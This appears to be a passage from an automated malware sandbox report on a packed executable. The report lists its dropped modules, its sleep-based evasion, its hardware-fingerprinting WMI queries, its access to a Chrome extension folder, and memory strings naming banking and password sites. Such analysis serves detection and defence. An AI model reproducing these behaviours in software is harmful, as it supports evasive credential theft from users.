                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_socket.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_uuid.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_lzma.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_overlapped.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_sqlite3.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_http_parser.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_ssl.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_brotli.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\charset_normalizer\md__mypyc.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_socket.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_http_writer.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_bz2.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_brotli.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_decimal.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_asyncio.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_brotli.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\select.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\frozenlist\_frozenlist.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ssl.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\_uuid.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\multidict\_multidict.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\bcrypt\_bcrypt.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\charset_normalizer\md.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\yarl\_quoting_c.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\zstandard\backend_c.pydJump to dropped file
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\aiohttp\_websocket.pydJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_multiprocessing.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\aiohttp\_helpers.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_decimal.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_ctypes.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\_queue.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\select.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\pycares\_cares.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\_cffi_backend.pydJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeAPI coverage: 0.6 %
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeAPI coverage: 0.3 %
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe TID: 8188Thread sleep count: 545 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe TID: 8188Thread sleep time: -545000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe TID: 8188Thread sleep count: 9422 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe TID: 8188Thread sleep time: -9422000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep count: 3412 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep count: 662 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5068Thread sleep count: 4388 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5068Thread sleep count: 4081 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeCode function: 48_2_00007FF81E50B970 _Py_NoneStruct,_PyArg_ParseTuple_SizeT,GetSystemInfo,VirtualAlloc,_Py_Dealloc,PyExc_MemoryError,PyErr_SetString,_PyObject_GC_New,PyExc_NotImplementedError,PyErr_Format,Py_FatalError,PyObject_GC_Track,PyExc_SystemError,PyErr_SetString,_Py_Dealloc,_Py_Dealloc,48_2_00007FF81E50B970
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1718105978.0000022334F18000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                      Source: net1.exe, 0000001E.00000002.1456890690.000002E2E3DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1718105978.0000022334F18000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicvss
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERVICE_NAME: vmicheartbeat
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                      Source: RuntimeusererVers.exe, 00000003.00000003.1668483408.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1717568567.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1657434536.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1670512900.000002233504C000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1649386523.000002233504A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1668955655.000002233504B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                      Source: RuntimeusererVers.exe, 00000003.00000003.1408952374.0000022334FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
